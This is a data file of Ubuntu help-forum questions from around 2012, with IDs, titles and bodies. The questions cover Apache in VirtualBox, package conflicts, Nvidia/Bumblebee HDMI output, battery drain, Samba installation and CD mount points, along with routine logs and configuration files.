222563	how to get apache to serve a site via virtualbox ?	this tutorial taught me how to create an ubuntu server ( 12.10 , 64-bit ) vm in virtualbox on a windows 7 host machine , install apache and have it serve a site from a dummy domain accessible via the host machine 's browser . it took a day and many attempts ( although it seemed i was following the instructions as they were laid out , i was always doing something wrong ) and i 'd finally done it . i find ubuntu as a much seamless development environment than windows , and so i wanted to same thing on ubuntu . so , this time , i created an ubuntu server vm in virtualbox on ubuntu host machine , installed apache and configured it . but when i access the site via the dummy domain , i get the 'server not found ' error . yes , i did modify the /etc/hosts file just as mentioned in the tutorial ( which is for windows 7 ) . but i could n't get it to work . do n't know what 's wrong . anyone know what else i should be doing ? edit : if i am not clear enough , please ask . i am willing to clarify .
222564	how to uninstall .deb python module	i have python2.7 default n ubuntu ( 64bit ) , i have wrongly installed a python module ( uno module ) which is for 32bit arch . how i have installed wget ( uno-module32-version ) .deb dpkg -i ( uno-module32-version ) .deb what is the safe way to uninstall this python module , so that i can install 64bit version . update1 : when i tried installing 64 version ( while 32bit version is still installed ) : dpkg -i python-uno_3.5.4-0ubuntu1.1_amd64.deb it gave me error : dpkg : error processing python-uno_3.5.4-0ubuntu1.1_amd64.deb ( -- install ) : python-uno : 1:3.5.4-0ubuntu1.1 ( multi-arch : no ) is not co-installable with python-uno : i386 1:3.5.4-0ubuntu1.1 ( multi-arch : no ) which is currently installed errors were encountered while processing : python-uno_3.5.4-0ubuntu1.1_amd64.deb
222565	which logfile ( s ) log ( s ) errors reading a cd ?	i introduce a cd-rw , maybe blank ( i really do n't know ) , and after a little movement inside the reader , the cd is ejected without any message at all . i would like to know what is going on and the reason why it is ejected . how can i know that in natty . the cd reader is working ok because i can read other cd 's . it only gave me problems writing from natty , a few days ago , but with macos there was no problem . thank you edit : maybe there is no error , but then , how can i know what is in the cd if there is anything ?
222568	warnings in syslog	syslog displays these warnings and i would like to know how can i know what they mean in order to search what can i do about them . $ cat /var/log/syslog| grep -i 'warn' nov 27 13:48:19 pc networkmanager [ 781 ] : < warn > bluez error getting default adapter : the name org.bluez was not provided by any .service files nov 27 13:48:19 pc gdm-binary [ 778 ] : warning : unable to find users : no seat-id found nov 27 13:48:20 pc networkmanager [ 781 ] : < warn > bluez error getting default adapter : no such adapter nov 27 13:48:24 pc gdm-simple-greeter [ 1285 ] : gtk-warning : /build/buildd/gtk+2.0-2.24.4/gtk/gtkwidget.c:5687 : widget not within a gtkwindow edit : the question is about the meaning of the warnings and not about the wifi . the questions in the answers are misleading .
222572	switchable nvidia gt 540m hdmi output problem	i have bought a alienware m11xr3 with nvidia gt 540m and a internal graphic card . uname -r 3.2.0-33-generic-pae here is the lspci | grep vga output : lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 540m ] ( rev ff ) so far so good . the geforce is recognized and i can use it through optirun : optirun glxspheres polygons in scene : 62464 visual id of window : 0x21 context is direct opengl renderer : geforce gt 540m/pcie/sse2 glxspheres polygons in scene : 62464 visual id of window : 0x9e context is direct opengl renderer : mesa dri intel ( r ) sandybridge mobile x86/mmx/sse2 here the files from /etc/bumblebee bumblebee.conf # configuration file for bumblebee . values should **not** be put between quotes # # server options . any change made in this section will need a server restart # to take effect . [ bumblebeed ] # the secondary xorg server display number virtualdisplay=:8 # should the unused xorg server be kept running ? set this to true if waiting # for x to be ready is too long and do n't need power management at all . keepunusedxserver=true # the name of the bumbleblee server group name ( gid name ) servergroup=bumblebee # card power state at exit . set to false if the card shoud be on when bumblebee # server exits . turncardoffatexit=false # the default behavior of '-f ' option on optirun . if set to `` true '' , '-f ' will # be ignored . noecomodeoverride=false # the driver used by bumblebee server . if this value is not set ( or empty ) , # auto-detection is performed . the available drivers are nvidia and nouveau # ( see also the driver-specific sections below ) driver= # # client options . will take effect on the next optirun executed . [ optirun ] # the method used for virtualgl to transport frames between x servers . # possible values are proxy , jpeg , rgb , xv and yuv . vgltransport=proxy # should the program run under optirun even if bumblebee server or nvidia card # is not available ? allowfallbacktoigc=false # driver-specific settings are grouped under [ driver-name ] . the sections are # parsed if the driver setting in [ bumblebeed ] is set to name ( or if auto- # detection resolves to name ) . # pmmethod : method to use for saving power by disabling the nvidia card , valid # values are : auto - automatically detect which pm method to use # bbswitch - new in bb 3 , recommended if available # switcheroo - vga_switcheroo method , use at your own risk # none - disable pm completely # https : //github.com/bumblebee-project/bumblebee/wiki/comparison-of-pm-methods # # section with nvidia driver specific options , only parsed if driver=nvidia [ driver-nvidia ] # module name to load , defaults to driver if empty or unset kerneldriver=nvidia-current module=nvidia pmmethod=auto # colon-separated path to the nvidia libraries librarypath=/usr/lib/nvidia-current : /usr/lib32/nvidia-current # comma-separated path of the directory containing nvidia_drv.so and the # default xorg modules path xorgmodulepath=/usr/lib/nvidia-current/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia # # section with nouveau driver specific options , only parsed if driver=nouveau [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau xorg.conf.nouveau section `` serverlayout '' identifier `` layout0 '' screen `` screen0 '' endsection section `` device '' identifier `` device0 '' driver `` nouveau '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' endsection xorg..conf.nvidia section `` serverlayout '' identifier `` layout0 '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' option `` nologo '' `` true '' option `` connectedmonitor '' `` dfp '' endsection xrandr -q screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 8192 x 8192 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 256mm x 144mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) now there are several problems : 1 ) bumblebee seems not going off , when i close a application running in optirun . remains on `` on '' 2 ) the hdmi output doesnt work at all . means , i cant really say if there is a reaction , when i plugin the hdmi cable . obviously there is nothing displayed . 3 ) cant find cat /etc/x11/xorg.conf ! 4 ) i got also a displayport and thought of using this , but havent got an adapter yet . maybe with this it works ? honestly i am realtively new to linux/ubuntu . i am working about half a year with ubuntu , so i am not a professional , but i can do basic stuff without problems and follow guides . would be very nice if we can solve the problem . there are many m11xr3 users who have this problem and i guess its not impossible to get hdmi/displayport ( ? ) working . if you need any other informations please let me know ! thanks for your time and help ! okay an udpate from my side . now i can use the hdmi output in a not very handy way . what i did : as i wrote in my last comment , i have reinstalled ubuntu with the linlap guide . then i found this two usefull guides . now it works like here . hope i could help someone with this solution , but for me the mainproblem is , that you cant clone your desktop , you need to install another desktop environment . any ideas how to improve the script to use unity on both displays ?
222574	amd athlon 6000+ kernel panic during installation	i am trying to install ubuntu 10.04 on my pc . i get flashing scrollock and capslock lights and error kernel panic here screen shot http : //alexandrneverov.livejournal.com/pics/catalog/443/47342 installation of 11.04 ( x86_64 and i386 ) - get the same . 12.04 ca n't start installation process . if install system on other pc and then pick this hard with installed system in this pc - it works maybe 5 min and then frezze or reboot . what can i do to install ubuntu ? ? i have changed memory , video , atx , hard - no matter - it shuts down randomly , sometimes with this errors in image . what can i do to install ubuntu ? ?
222576	battery life starts at 2:30 hrs ( 99 % ) , but less than 1 minute later is only 1:30 hrs ( 99 % )	after searching this and other forums , i have n't seen this same issue listed anywhere for ubuntu 12 . prior to installing ubuntu 12.10 , my netbook ( acer aspireone d250 , sata hdd ) was consistently getting 2:30-3 hrs battery life under windows xp home , sp3 . however , immediately after installing ubuntu 12.10 , the battery life starts out at 2:30 hrs ( 99 % ) , but less than 1 minute later suddenly drops to 1:30 hrs ( 99 % ) , which seems very odd . it could be a complete coincidence that the battery is suddenly flaky at the exact same moment that ubuntu 12.10 was installed , but that does n't seem likely . i 'm a newbie to ubuntu , so i do n't have much experience tweaking/trouble-shooting yet . here 's what i 've tried so far : enabled laptop mode ( sudo su , then echo 5 > /proc/sys/vm/laptop_mode ) and checked that it is running when the a/c adapter is unplugged , but it does n't seem to have made any noticeable difference in battery life , installed jupiter , but it did n't work and messed up the system , so i had to uninstall it , disabled bluetooth ( wifi is still on b/c it is necessary ) , set the screen to lowest brightness , etc. , run through at least 1 full power cycle ( running until the netbook shut itself off due to critical battery ) and have been using it normally ( sometimes plugged in , often unplugged until the battery gets very low ) for a week since installing ubuntu 12.10. installed powertop , but have no idea how to interpret its results . here are the results of acpi -b : w/ a/c adapter : battery 0 : full , 100 % immediately after unplugging : battery 0 : discharging , 99 % , 02:30:20 remaining 1 minute after unplugging : battery 0 : discharging , 99 % , 01:37:49 remaining 2-3 minutes after unplugging : battery 0 : discharging , 95 % , 01:33:01 remaining 10 minutes after unplugging : battery 0 : discharging , 85 % , 01:13:38 remaining results of cat /sys/class/power_supply/bat0/uevent : w/ a/c adapter : power_supply_name=bat0 power_supply_status=full power_supply_present=1 power_supply_technology=li-ion power_supply_cycle_count=0 power_supply_voltage_min_design=10800000 power_supply_voltage_now=12136000 power_supply_current_now=773000 power_supply_charge_full_design=4500000 power_supply_charge_full=1956000 power_supply_charge_now=1956000 power_supply_model_name=um08b32 power_supply_manufacturer=sanyo power_supply_serial_number= immediately after unplugging : power_supply_name=bat0 power_supply_status=discharging power_supply_present=1 power_supply_technology=li-ion power_supply_cycle_count=0 power_supply_voltage_min_design=10800000 power_supply_voltage_now=11886000 power_supply_current_now=773000 power_supply_charge_full_design=4500000 power_supply_charge_full=1956000 power_supply_charge_now=1937000 power_supply_model_name=um08b32 power_supply_manufacturer=sanyo power_supply_serial_number= 1 minute later : power_supply_name=bat0 power_supply_status=discharging power_supply_present=1 power_supply_technology=li-ion power_supply_cycle_count=0 power_supply_voltage_min_design=10800000 power_supply_voltage_now=11728000 power_supply_current_now=1174000 power_supply_charge_full_design=4500000 power_supply_charge_full=1956000 power_supply_charge_now=1937000 power_supply_model_name=um08b32 power_supply_manufacturer=sanyo power_supply_serial_number= 2-3 minutes later : power_supply_name=bat0 power_supply_status=discharging power_supply_present=1 power_supply_technology=li-ion power_supply_cycle_count=0 power_supply_voltage_min_design=10800000 power_supply_voltage_now=11583000 power_supply_current_now=1209000 power_supply_charge_full_design=4500000 power_supply_charge_full=1956000 power_supply_charge_now=1878000 power_supply_model_name=um08b32 power_supply_manufacturer=sanyo power_supply_serial_number= 10 minutes later : power_supply_name=bat0 power_supply_status=discharging power_supply_present=1 power_supply_technology=li-ion power_supply_cycle_count=0 power_supply_voltage_min_design=10800000 power_supply_voltage_now=11230000 power_supply_current_now=1239000 power_supply_charge_full_design=4500000 power_supply_charge_full=1956000 power_supply_charge_now=1644000 power_supply_model_name=um08b32 power_supply_manufacturer=sanyo power_supply_serial_number= results of upower -i /org/freedesktop/upower/devices/battery_bat0 : w/ a/c adapter : native-path : /sys/devices/lnxsystm:00/device:00/pnp0a08:00/device:02/pnp0c0a:00/power_supply/bat0 vendor : sanyo model : um08b32 power supply : yes updated : tue nov 27 15:24:58 2012 ( 823 seconds ago ) has history : yes has statistics : yes battery present : yes rechargeable : yes state : fully-charged energy : 21.1248 wh energy-empty : 0 wh energy-full : 21.1248 wh energy-full-design : 48.6 wh energy-rate : 8.3484 w voltage : 12.173 v percentage : 100 % capacity : 43.4667 % technology : lithium-ion immediately after unplugging : native-path : /sys/devices/lnxsystm:00/device:00/pnp0a08:00/device:02/pnp0c0a:00/power_supply/bat0 vendor : sanyo model : um08b32 power supply : yes updated : tue nov 27 15:41:25 2012 ( 1 seconds ago ) has history : yes has statistics : yes battery present : yes rechargeable : yes state : discharging energy : 20.9196 wh energy-empty : 0 wh energy-full : 21.1248 wh energy-full-design : 48.6 wh energy-rate : 8.3484 w voltage : 11.86 v time to empty : 2.5 hours percentage : 99.0286 % capacity : 43.4667 % technology : lithium-ion history ( charge ) : 1354023683 99.029 discharging 1 minute later : native-path : /sys/devices/lnxsystm:00/device:00/pnp0a08:00/device:02/pnp0c0a:00/power_supply/bat0 vendor : sanyo model : um08b32 power supply : yes updated : tue nov 27 15:42:31 2012 ( 17 seconds ago ) has history : yes has statistics : yes battery present : yes rechargeable : yes state : discharging energy : 20.9196 wh energy-empty : 0 wh energy-full : 21.1248 wh energy-full-design : 48.6 wh energy-rate : 13.5432 w voltage : 11.753 v time to empty : 1.5 hours percentage : 99.0286 % capacity : 43.4667 % technology : lithium-ion history ( charge ) : 1354023683 99.029 discharging history ( rate ) : 1354023751 13.543 discharging 2-3 minutes later : native-path : /sys/devices/lnxsystm:00/device:00/pnp0a08:00/device:02/pnp0c0a:00/power_supply/bat0 vendor : sanyo model : um08b32 power supply : yes updated : tue nov 27 15:45:06 2012 ( 20 seconds ago ) has history : yes has statistics : yes battery present : yes rechargeable : yes state : discharging energy : 20.2824 wh energy-empty : 0 wh energy-full : 21.1248 wh energy-full-design : 48.6 wh energy-rate : 13.7484 w voltage : 11.545 v time to empty : 1.5 hours percentage : 96.0123 % capacity : 43.4667 % technology : lithium-ion history ( charge ) : 1354023906 96.012 discharging 1354023844 97.035 discharging history ( rate ) : 1354023906 13.748 discharging 1354023875 12.992 discharging 1354023844 13.284 discharging 10 minutes later : native-path : /sys/devices/lnxsystm:00/device:00/pnp0a08:00/device:02/pnp0c0a:00/power_supply/bat0 vendor : sanyo model : um08b32 power supply : yes updated : tue nov 27 15:54:24 2012 ( 28 seconds ago ) has history : yes has statistics : yes battery present : yes rechargeable : yes state : discharging energy : 18.1764 wh energy-empty : 0 wh energy-full : 21.1248 wh energy-full-design : 48.6 wh energy-rate : 13.2948 w voltage : 11.268 v time to empty : 1.4 hours percentage : 86.0429 % capacity : 43.4667 % technology : lithium-ion history ( charge ) : 1354024433 86.043 discharging history ( rate ) : 1354024464 13.295 discharging 1354024433 13.662 discharging 1354024402 13.781 discharging i noticed that between # 2 and # 3 ( 0 and 1 minutes after unplugging ) , while the battery still reports 99 % charge and drops from 2:30 hr to 1:30 hr , the energy usage goes from 8.34 w to 13.54 w and the current_now increases , but should n't it be using less energy in battery mode since the screen is much dimmer and it 's in power saving mode ? ( or is that normal behavior ? ) it also seems to drain more quickly than what it predicts , especially with the 1-1.25 hour drop in the first minute of being unplugged , which seems odd . what really concerns me is that ubuntu 12.10 may not be properly managing the battery ( with the sudden change in charge/life from 2:30 to 1:30 or 1:15 within a minute of unplugging ) , and that a new battery may quickly die under ubuntu 12.10 . i 'd greatly appreciate any advice/suggestions on what to do , and especially whether there 's a way to get back the 1-1.5 hrs of battery life that were suddenly lost when changing from winxp to ubuntu 12.10 . thanks : )
222587	how to check `` apt-get upgrade '' status after losing ssh connection ?	usually i upgrade my ubuntu installation through a ssh connection . sometimes this ssh connection would be lost or i would accidentally close the terminal window . it is possible to check the upgrade status after a ssh re-login into the computer ?
222589	desktop icon 's wo n't show until i open folder in file manager	when i start my computer and login the desktop icons do not show . however , when i open the desktop folder in my file manager , they appear . how can i make them show right from the start ? i use nemo as file manager , unity is my desktop environment and the whole thing runs on ubuntu 12.10 quantal quetzal .
222592	switching desktop environment from unity ?	basicall i have installed a few desktop environments . and if you are familiar with unity , you know that the way switching works , is you get this sort of drop-down with all the environments installed , you then high-light the desired option and click `` ok '' . so my problem is that i have quite a few installed , and ok button is outside of the screen , and i can not find any way to scroll down ? so in turn , i can not switch my de as a result.. any way around this ?
222596	direct download problem	the download has got stuck on the first file ( ubuntu-12.10-wubi-amd64.tar.xz ) and it wo n't continue . i have like 50 hours remaining time for my download to complete . anyone knows what 's wrong ? edit : my internet connection works fine . i tried to download with firefox and chrome as well but still , nothing changed .
222597	overdriven/distorted sounds with pulseaudio	i 'm experiencing some odd problems in some applications that use pulseaudio , in particular vlc media player and skype . the sounds reproduced by these two application sound overdriven , distorted , as if the audio is being processed by a guitar effect . what is very odd is that the sounds being played by the two applications affect sounds played at the same time as well . if , for instance , i 'm watching a youtube video while i 'm logged in skype , and one of my contacts logs in , the sound of the video gets distorted too . it was easy to fix the problem on vlc , just by setting alsa as the device , although this leaves some clicks in the audio , each two or three seconds . i know somebody will suggest to simply deactivate every sound notification in skype , but i 'd rather solve this problem once and for all , before experiencing it while using another application .
222603	how can i use remmina to connect to a windows server ?	i have all this information to connect to a windows exchange server at work , but i do n't know where to enter it in remmina as it has different fields , with different names . the windows-screens give met the following . general-tab : a computer name and a user-name consisting of probably a domainname\username view-tab : the screen has to be set at 32bits and full-size local sources : tick support of smart-cards , gates , stations and other pnp . advanced-tab : make a connection and do n't warn me . and when i push the settings button i have to enter the following : use these settings to use remote desktop . server-name : rds.name.org connection-method : ask for password ( ntlm ) . tick the box at do n't use local addresses for remote desktop gateway-server . and tick the box at the bottom : use my remote desktop gateway-references for my remote computer . i got all this info from my work to make a remote desktop connection from a windows machine . as usual they think there are no other os users . can you help ?
222604	killing processes from java	i have created a java application that can start processes and capture their pids so that the application can monitor the process . the user may later choose to kill the whole process tree ( session ) . i have done this by utilizing setsid . one scenario is starting a whole bunch of different processes via a shell script by : setsid < shell script > . the pid represents the new session and killing it will kill all processes spawned in that session . it worked great until ubuntu 12.10 was released . now i can not kill all sessions started via setsid . one example is firefox and google earth . gedit can still be killed if started through setsid . i created a simple test program that perform kill -sigterm -pid . the test program manages to kill firefox started via setsid under ubuntu 12.04 but not under ubuntu 12.10 . i do n't know what has changed . i have executed the program in both distributions using openjdk 6 , 7 and oracle jdk 6. public class kill { public static void main ( string [ ] args ) { try { system.out.println ( `` kill -sigterm - '' + args [ 0 ] ) ; process proc = runtime.getruntime ( ) .exec ( `` kill -sigterm - '' + args [ 0 ] ) ; int exitval = proc.waitfor ( ) ; system.out.println ( `` exit value : `` + exitval ) ; // often 1 under ubuntu 12.10 } catch ( exception e ) { } }
222609	why does google music manager refuse to open in 12.04 ?	i like to upload my music to my google account and i use google music manager to do this . when i downloaded the music manager the first time , i wanted to actually download all the music i purchased from google onto my ubuntu 12.04 dell latitude e6400 32-bit . it worked fine and all the music downloaded . now i have ripped some of my old cds and want to upload that content to google . when i chose google music manager from my applications , it pops up in my tray as running but nothing actually happens . when i click on it and chose options which used to open up the interface to chose which folders you wanted to upload and so forth , nothing happens . i have uninstalled and reinstalled several times and it still does the same thing . i ran it from command line and i see i am getting the errors below . i intend on asking this same question in a google forum but i wanted to ask here since i usually get better answers from the ubuntu community . t : ~ $ google-musicmanager log4cxx : no appender could be found for logger ( root ) . log4cxx : please initialize the log4cxx system properly .
222612	where are theme settings stored ?	i installed ubuntu with several desktop environments , including unity , kde and lxde . i am struggling to change the background tooltip color which is black and causes displaying problems in eclipse . i managed to do this in unity as explained here : how to change tooltip background color in unity ? i was unable to do this in lxde . however when i changed the tooltip background color from kde gui settings ( system settings - > application appearance - > colors ) , the change was also reflected in lxde , so i assume there must be a configuration file from which all desktop environments read this information . where are theme settings stored ?
222613	with upstart what does it mean in terms of performance to have a `` initramfs-less boot support ''	reading the latest upstart version ( upstart 1.6 right now ) , i saw the following line : added initramfs-less boot support does this mean that the step for initramfs can be skipped ? will the booting time be faster or the system perform better ?
222617	running ubuntu 12.04 on nokia booklet 3g	i installed ubuntu 12.04 on my nokia booklet 3g ( pulled out of mothballs ) without any problem , or rather , the installation process has recognized all the hardware . after installation from dvd , reboot but the screen remains black and the cursor blinks . i documented and the problem seems to be the intel gma500 poulsbo version https : //wiki.ubuntu.com/hardwaresupport ... r_overview i have n't a lot of practice , so there 're some kind who has already experienced about that and would be able to explain to me how do i do specifically ? i look forward to your valuable help .
222622	cdrom is mounted , but where ?	a nautilus folder will be opened automatically when inserting a cd in a drive . it is under devices with name audiodisk . as long as the files are accessed via nautilus everything is fine . the problem is that i can not find the cdrom files from the file system . this means that i can not access the cdrom files directly from applications . this is a problem in 12.10 . i have checked all subfolders in /media , /mnt and /cdrom and did n't find the cdrom content there . mount and df commands do not show anything related to cdrom . in /etc/fstab there is a line /dev/scd0 /media/cdrom0 udf , iso9660 user , noauto , exec , utf8 0 0 but the cdrom files are not in /media/cdrom0 , it seems empty . disks show the drive as device /dev/sr0 ( read-only ) when clicking a cdrom file in nautilus and checking the properties it says under the basic tab location : cdda : //sr0/ /etc/mtab commmand output /dev/sda1 / ext3 rw , relatime , errors=remount-ro 0 0 proc /proc proc rw 0 0 sysfs /sys sysfs rw , noexec , nosuid , nodev 0 0 none /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 udev /dev devtmpfs rw , mode=0755 0 0 devpts /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 tmpfs /run tmpfs rw , noexec , nosuid , size=10 % , mode=0755 0 0 none /run/lock tmpfs rw , noexec , nosuid , nodev , size=5242880 0 0 none /run/shm tmpfs rw , nosuid , nodev 0 0 none /run/user tmpfs rw , noexec , nosuid , nodev , size=104857600 , mode=0755 0 0 /dev/sda6 /home ext3 rw , relatime , user_xattr 0 0 binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw , noexec , nosuid , nodev 0 0 gvfsd-fuse /run/user/s/gvfs fuse.gvfsd-fuse rw , nosuid , nodev , user=s 0 0 how to find the mount point ?
222623	installing ubuntu as the primary os on multi-boot system	i was thinking of downloading this to my netbook since i love the operating system . how do i install it to override all my other operating systems so i just have ubuntu .
222625	new ipod shuffle 4 gen will not play , i use rhythmbox , ubuntu 12.04	rhythmbox could not initialise the ipod so i used gtkpod and used rhythmbox to copy songs into the ipod . can access these files with nautilus and can play them with rhythmbox . the ipod will not play them and says `` use itunes '' if pressed . looks like the ipod uses some sort of song-index which is not working . moving files from and to the ipod ( drage and drop ) makes rhythmbox and gtkpod crash . in short ; something is wrong at the moment . how do i get the ipod working , any suggestions ?
222632	how can i copy a file from one partition to another ?	i started with linux a year ago . few weeks ago it was my idea to install the efistub bootloader . i used an live cd to freshly install 12.10 , and studied the articles of http : //www.rodsbooks.com/ inside out . the problem i am facing is that few files need to be copied from sda2 ( ext ) to sda1 ( fat32 ) . i can not find a way to do it ?
222641	can not format a fat filesystem , getting error `` both fats appear to be corrupt . giving up . ''	i am trying format an fat ( or fat32 ) file system on my ubuntu system , but i am not able to format the device , each time i am getting the error both fats appear to be corrupt . giving up . i have tried all options like sudo dosfsck -t -a -w /dev/sdc1 sudo dosfsck -w -r -l -a -v -t /dev/sdc1 but each time the same message comes , can any one guide me how to recover the filesystem , also i do n't mind losing data of this drive as this is an external pen drive . also , can u pl suggest of some method other then booting from a cd with software like gparted or something like that .
222646	wubi install of ubuntu 12.10 on hp dv6 6154tx causes uncontrolled heating , fan speed , low battery life	i have a hp dv6 6154tx with an integrated intel gpu and a discrete ati gpu ( radeon mobility hd 6490m ( 1 gb ddr5 ) ) . -problems : when i install ubuntu 12.10 using wubi , my laptop starts heating , fans start to run fast ( to much of noise ) , and battery goes really low any attempt to install catalyst drivers ( from ati official site and also proprietary drivers ) fails , as after reboot when i login everything is gone like no unity no desktop and sometimes black screen appears . even bumblebee and jupiter didnt help ... . : ( so please , please can somebody post the real solution to my problems i.e . ( inc battery life and stop fan noise and heating ) . ( i want to install ubuntu only using wubi )
222649	what file size units do applications on ubuntu use ?	i have noticed that different applications use different units , or mean different things by them . for example , i have come across kb , kb , kib , kb and k. how many bytes do each of these units represent ? if there are different definitions for these units , which ones do which applications use ?
222651	screen resulution using ubuntu on an hp pavilion zv5000 notebook pc	if i install the latest ubuntu on an hp pavilion zv5000 notebook pc will i get the full screen resolution of 1280 x 800 ? using windows 8 on the notebook does not give me the full resolution . hp and nvidia do not have drivers for this machine for windows 7 or 8 . with windows xp i got the full resolution .
222652	user switching in xfce 12.04 with lightdm and dumping unneeccesary gnome libs	i 'm an elder non-techie mac-to-linux convert trying to play the linux tech game by ear , so please be gentle ! : ) i am running xfce ubuntu 12.04 totally on a 8-gig flash drive and it 's fantastic . i am starting to run into potential space issues ( down to 1.0 gig free from 1.9 gigs since being installed last summer ) , most likely because of growing thunderbird mail files , and this prompted my question . i just installed lightdm on my system because i want the ability to switch users in xfce if i follow instructions on another blog . they advised using lightdm instead of gdm because lightdm does n't download gnome libraries . that 's great since i need the space , but my question is how can i tell whether i do n't already have gnome libraries installed from other updates and such ? and can i minimize having any gnome libraries ? the method for me to switch users entails creating a `` fast-user-switch '' file in /usr/local/bin ; is there any easier way ? one last thing so i di n't have topen another needless thread ; while experimenting i somehow lost the share folder in one of my accounts . is there any way to get a share folder back ? thanks for any tips ! jim in nyc
222656	on ubuntu , which applications use binary file size units , and which ones use decimal units ?	applications on ubuntu use different file size units . binary units are multiples of 1024 , whereas decimal units are multiples of 1000 . which applications on ubuntu use which system ?
222658	samba installation failed on ubuntu 12.10	i was trying to install samba to access shared printer on windows pc connected via office network , following response came out from terminal . please guide me how to install samba or any other alternative . crm @ crm-hp-g62-notebook-pc : ~ $ sudo apt-get install samba [ sudo ] password for crm : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : samba : depends : samba-common ( = 2:3.6.6-3ubuntu4 ) but 2:3.6.6-3ubuntu5 is to be installed depends : libwbclient0 ( = 2:3.6.6-3ubuntu4 ) but 2:3.6.6-3ubuntu5 is to be installed recommends : tdb-tools but it is not going to be installed e : unable to correct problems , you have held broken packages . crm @ crm-hp-g62-notebook-pc : ~ $
222661	mobile internet modem olivetti olicard 155 does not work in ubuntu 12.10	i have a problem , i bought a 3g mobile modem , but does not work in ubuntu 12.10 , also did not work on ubuntu 12.04 . i installed the usb modeswitch and has the same flaw , does not recognize the modem within the connection manager , i connect the modem to the usb port and wait up to 20 minutes and does not recognize the modem . i ran the command recognizes the modem and lsusb as `` bus 001 device 007 : id 0b3c : c004 olivetti techcenter . '' does anyone have this modem , you can help me solve the problem , or does anyone have a solution ? because the manufacturer does not support linux and according to some forums usbmodeswitch supports esste model . olivetti olicard modem 155 .
222662	software centre neither update does not work on 12.04	m @ samsung : ~ $ sudo rm /var/lib/apt/lists/* -vf [ sudo ] password for m : rm : can not remove `/var/lib/apt/lists/partial ' : is a directory m @ samsung : ~ $ sudo apt-get clean m @ samsung : ~ $ sudo apt-get update n : ignoring file 'gnomebaker.lis ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension e : malformed line 1 in source list /etc/apt/sources.list.d/gnomebaker.list ( uri parse ) e : the list of sources could not be read . m @ samsung : ~ $ sudo apt-get install software-center reading package lists ... done building dependency tree reading state information ... done software-center is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up update-notifier-common ( 0.119ubuntu8.6 ) ... bus error ( core dumped ) dpkg : error processing update-notifier-common ( -- configure ) : subprocess installed post-installation script returned error exit status 135 dpkg : dependency problems prevent configuration of update-notifier : update-notifier depends on update-notifier-common ( = 0.119ubuntu8.6 ) ; however : package update-notifier-common is not configured yet . dpkg : error processing update-notifier ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : update-notifier-common update-notifier n : ignoring file 'gnomebaker.lis ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension e : malformed line 1 in source list /etc/apt/sources.list.d/gnomebaker.list ( uri parse ) e : the list of sources could not be read . e : sub-process /usr/bin/dpkg returned an error code ( 1 ) m @ samsung : ~ $
222663	dual boot windows 8 and ubuntu on hp envy ultrabook 6t-1100	i plan to buy hp envy ultrabook 6t-1100 which comes with windows 8 , 32gb ssd and 500gb hard drive . i however want to dual boot it with ubuntu . any issues ? furthermore , would it be possible to install ubuntu on ssd and windows 8 on the standard hard drive ? is it possible to disable uefi from bios on this system ?
222668	migration from ubuntu to mint	i 'd like to migrate from ubuntu 12.10 to mint 14 , but it 's important that i keep everything which is in my /home directory . will it work if i just put the directory on a usb stick , then replace the default one by ny old one after the install is complete ( i 'll use the same username/paaswd on the new install ) ?
222669	how to know when commercial app will be published	is there a way for me to know when my app will be published . i assume there is a list of apps which needs to be reviewed , so i would like to know on which place is my app , in that table . i hope you understand me .
222670	where are the deb files downloaded by software center and the update manager stored ?	i want to know where the deb files that are downloaded during the installation from the software center are stored . its easy to download i know , but here in my country , bandwidths are extreemly limited and it would be better to get the deb file for te next time rather than waiting a complete night for download ! aslo , i would like to know where the deb files downloaded during uodates are stored. ? thankyou !
222671	permanently disable cd drive	i have no use for a cd drive , ever . yet it exists , consumes power , opens inadvertently when in its case or in my bed and makes noise whenever computer sleeps , wakes , shuts down or boots . i would like to shut it out of existence . this will also be true if my next laptop has one too . but in this particular case i do n't have the password to access the bios ( hope it 's not required ) . udisks -- show-info /dev/sr0 shows drive : vendor : hl-dt-st model : hl-dt-st dvdram gsa-t50l revision : sc04 serial : mks92ih3934 wwn : detachable : 0 can spindown : 0 rotational media : yes , unknown rate write-cache : unknown ejectable : 1 adapter : /org/freedesktop/udisks/adapters/0000_3a00_3a1f_2e2 i think detachable : 0 indicates what i want is not possible but i feel like i 'm probably not the only one to find a cd drive useless and annoying . so maybe someone has an idea on how to do this . i was about to test playing with files in /sys/bus/scsi/devices/1:0:0:0/block/sr0/power but i 'd like to avoid messing with stuff i ca n't really handle and that could make it unmountable but still annoying or worse . feel free to ask for more details .
222672	my pc restarts when watching movies	i am using ubuntu 12.10 . i always keep my computer updated . now , for some strange reason , whenever i start watching any movie , the computer restarts randomly . i tried watching with vlc , totem and mplayer . result is the same . can anybody tell me what can be possibly wrong ? and there must be some log files including informations during the restarts . can someone tell me where i can find those logs ? thanks in advance .
